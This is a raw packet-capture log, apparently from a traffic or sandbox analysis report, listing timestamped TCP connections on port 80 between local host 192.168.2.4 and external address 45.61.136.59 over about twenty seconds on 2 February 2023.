                                                                                                                                            Feb 2, 2023 21:19:44.968722105 CET804997645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.968884945 CET804997645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.022551060 CET4997680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.090683937 CET4997680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.131742954 CET4997780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.258562088 CET804997645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.258658886 CET4997680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.305562973 CET804997745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.305711985 CET4997780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.305970907 CET4997780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.479559898 CET804997745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.479681969 CET804997745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.523236036 CET4997780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.587668896 CET4997780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.618902922 CET4997880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.761537075 CET804997745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.762026072 CET4997780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.783839941 CET804997845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.784028053 CET4997880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.784344912 CET4997880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:45.948892117 CET804997845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.948961973 CET804997845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.991374016 CET4997880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.177042007 CET4997880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.225521088 CET4997980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.341872931 CET804997845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:46.342113972 CET4997880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.390397072 CET804997945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:46.394181013 CET4997980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.394429922 CET4997980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.559134960 CET804997945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:46.559201002 CET804997945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:46.601022005 CET4997980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.666366100 CET4997980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.703392029 CET4998080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.831408024 CET804997945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:46.831619978 CET4997980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.868277073 CET804998045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:46.868550062 CET4998080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:46.878473043 CET4998080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.043557882 CET804998045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.043617964 CET804998045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.085289955 CET4998080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.150180101 CET4998080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.176903009 CET4998180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.315099955 CET804998045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.315207958 CET4998080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.341926098 CET804998145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.342127085 CET4998180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.342403889 CET4998180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.506958008 CET804998145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.507041931 CET804998145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.554090023 CET4998180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.630283117 CET4998180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.660327911 CET4998280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.794939041 CET804998145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.795018911 CET4998180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.824912071 CET804998245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.825030088 CET4998280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.825387955 CET4998280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:47.989927053 CET804998245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.990009069 CET804998245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.038460016 CET4998280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.105127096 CET4998280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.133434057 CET4998380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.269862890 CET804998245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.270036936 CET4998280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.298150063 CET804998345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.298315048 CET4998380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.298557043 CET4998380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.463236094 CET804998345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.463285923 CET804998345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.507255077 CET4998380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.574784040 CET4998380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.612278938 CET4998480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.739861965 CET804998345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.740139961 CET4998380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.777148962 CET804998445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.778506994 CET4998480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.779122114 CET4998480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:48.944027901 CET804998445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.944104910 CET804998445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.991646051 CET4998480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:49.651365995 CET4998480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:49.688155890 CET4998580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:49.816468000 CET804998445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:49.816725969 CET4998480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:49.853108883 CET804998545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:49.853368998 CET4998580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:49.853785992 CET4998580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.018506050 CET804998545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:50.018563032 CET804998545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:50.069912910 CET4998580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.381645918 CET4998580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.412301064 CET4998680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.546821117 CET804998545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:50.547010899 CET4998580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.579828024 CET804998645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:50.580076933 CET4998680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.581196070 CET4998680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.748526096 CET804998645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:50.748590946 CET804998645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:50.788687944 CET4998680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.854846001 CET4998680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:50.880382061 CET4998780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.022537947 CET804998645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.022620916 CET4998680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.048542976 CET804998745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.048708916 CET4998780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.049133062 CET4998780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.217356920 CET804998745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.217731953 CET804998745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.273080111 CET4998780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.329726934 CET4998780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.355564117 CET4998880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.498121023 CET804998745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.498301029 CET4998780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.520308018 CET804998845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.520554066 CET4998880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.522034883 CET4998880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.686564922 CET804998845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.687874079 CET804998845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.741939068 CET4998880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.790941000 CET4998880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.827040911 CET4998980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.955758095 CET804998845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.958750010 CET4998880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.994998932 CET804998945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.997056961 CET4998980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:51.997380972 CET4998980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:52.165225029 CET804998945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:52.165290117 CET804998945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:52.210676908 CET4998980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:52.509478092 CET4998980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:52.537523985 CET4999080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:52.677578926 CET804998945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:52.677659035 CET4998980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:52.702194929 CET804999045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:52.702373981 CET4999080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:52.702811003 CET4999080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:52.867327929 CET804999045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:52.867424011 CET804999045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:52.913876057 CET4999080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:53.370239973 CET4999080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:53.397326946 CET4999180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:53.535016060 CET804999045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:53.536998034 CET4999080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:53.562266111 CET804999145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:53.562381983 CET4999180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:53.563119888 CET4999180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:53.727782965 CET804999145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:53.727941990 CET804999145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:53.773310900 CET4999180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.200371981 CET4999180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.236049891 CET4999280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.366337061 CET804999145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:54.367686987 CET4999180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.400868893 CET804999245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:54.402012110 CET4999280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.402822971 CET4999280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.567442894 CET804999245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:54.567658901 CET804999245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:54.617177963 CET4999280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.681606054 CET4999280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.715406895 CET4999380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.846716881 CET804999245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:54.846803904 CET4999280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.880409956 CET804999345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:54.880611897 CET4999380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:54.880831003 CET4999380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:55.045742989 CET804999345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:55.045931101 CET804999345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:55.085983038 CET4999380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:55.541835070 CET4999380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:55.577481031 CET4999480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:55.706558943 CET804999345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:55.706653118 CET4999380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:55.742191076 CET804999445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:55.742928982 CET4999480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:55.743599892 CET4999480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:55.908097982 CET804999445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:55.908194065 CET804999445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:55.961158991 CET4999480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.029787064 CET4999480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.060066938 CET4999580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.195056915 CET804999445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:56.195552111 CET4999480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.224847078 CET804999545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:56.226949930 CET4999580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.227917910 CET4999580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.392571926 CET804999545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:56.392734051 CET804999545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:56.445453882 CET4999580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.714905977 CET4999580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.747956038 CET4999680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.879726887 CET804999545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:56.880040884 CET4999580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.912719965 CET804999645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:56.912822008 CET4999680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:56.913079977 CET4999680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:57.077601910 CET804999645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:57.078567982 CET804999645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:57.132977009 CET4999680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:57.186887026 CET4999680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:57.219996929 CET4999780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:57.351932049 CET804999645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:57.352011919 CET4999680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:57.384895086 CET804999745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:57.385015965 CET4999780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:57.385440111 CET4999780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:57.550055981 CET804999745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:57.550249100 CET804999745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:57.601824045 CET4999780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:58.039160013 CET4999780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:58.068497896 CET4999880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:58.204051971 CET804999745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:58.206582069 CET4999780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:58.242492914 CET804999845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:58.243273973 CET4999880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:58.243803978 CET4999880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:58.417558908 CET804999845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:58.417655945 CET804999845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:58.461231947 CET4999880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:58.890542030 CET4999880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:58.924669027 CET4999980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.064728975 CET804999845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:59.064851046 CET4999880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.092395067 CET804999945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:59.095216990 CET4999980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.095657110 CET4999980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.262886047 CET804999945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:59.262938976 CET804999945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:59.305111885 CET4999980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.703512907 CET4999980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.733719110 CET5000080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.870892048 CET804999945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:59.870980978 CET4999980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.898580074 CET805000045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:59.898828030 CET5000080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:59.899364948 CET5000080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:00.063944101 CET805000045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:00.064121008 CET805000045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:00.117760897 CET5000080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:00.168714046 CET5000080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:00.210212946 CET5000180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:00.333631039 CET805000045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:00.333729029 CET5000080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:00.377775908 CET805000145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:00.377924919 CET5000180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:00.378770113 CET5000180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:00.546828032 CET805000145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:00.546883106 CET805000145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:00.602041960 CET5000180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.123166084 CET5000180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.290736914 CET805000145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:01.291273117 CET5000180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.309056997 CET5000280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.474004030 CET805000245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:01.474184036 CET5000280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.474476099 CET5000280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.639152050 CET805000245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:01.639381886 CET805000245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:01.680340052 CET5000280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.746413946 CET5000280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.775713921 CET5000380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.911314011 CET805000245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:01.911581039 CET5000280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.940603971 CET805000345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:01.943542004 CET5000380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:01.943878889 CET5000380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.108421087 CET805000345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:02.110050917 CET805000345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:02.164669037 CET5000380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.230415106 CET5000380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.259848118 CET5000480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.395423889 CET805000345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:02.396085978 CET5000380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.424626112 CET805000445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:02.425499916 CET5000480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.425790071 CET5000480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.590338945 CET805000445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:02.591098070 CET805000445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:02.633554935 CET5000480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.901690960 CET5000480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:02.933361053 CET5000580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.066679001 CET805000445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.066771984 CET5000480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.098325968 CET805000545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.098579884 CET5000580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.099117994 CET5000580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.263981104 CET805000545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.264117002 CET805000545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.305494070 CET5000580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.373328924 CET5000580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.405879974 CET5000680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.538424969 CET805000545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.538672924 CET5000580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.570760965 CET805000645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.570899963 CET5000680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.572449923 CET5000680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:03.737099886 CET805000645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.737195969 CET805000645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.789904118 CET5000680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.061856031 CET5000680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.094046116 CET5000780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.226902008 CET805000645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.227046013 CET5000680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.258925915 CET805000745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.259057999 CET5000780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.259871006 CET5000780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.425321102 CET805000745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.425386906 CET805000745.61.136.59192.168.2.4
